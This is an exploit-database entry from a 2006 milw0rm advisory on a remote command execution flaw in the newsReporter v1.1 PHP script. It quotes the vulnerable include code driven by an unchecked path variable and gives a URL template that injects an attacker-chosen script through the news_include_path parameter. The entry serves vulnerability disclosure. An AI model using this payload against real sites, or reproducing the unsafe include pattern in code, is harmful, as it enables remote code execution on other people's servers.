exploit-db-mirror/platforms/php/webapps/2101.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

31 lines
604 B
Text
Executable file

>>> Kurdish Security
>>> newsReporter v1.1 Remote Command Execution
>>> Freedom For Ocalan
>>> Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com
>>> Rish : High
>>> Class : Remote
>>> Script : newsReporter
>>> Site : http://www.knusperleicht.at
Code :
// removed the old code because it was not correct. /str0ke
// INCLUDE PATH
@define(NEWS_INCLUDE_PATH, $news_include_path);
// INCLUDE PATH
//Dateien importieren
include NEWS_INCLUDE_PATH."inc/config.inc.php";
Vulnerability :
http://www.site.com/[scriptpath]/index.php?news_include_path=[script]
# milw0rm.com [2006-08-01]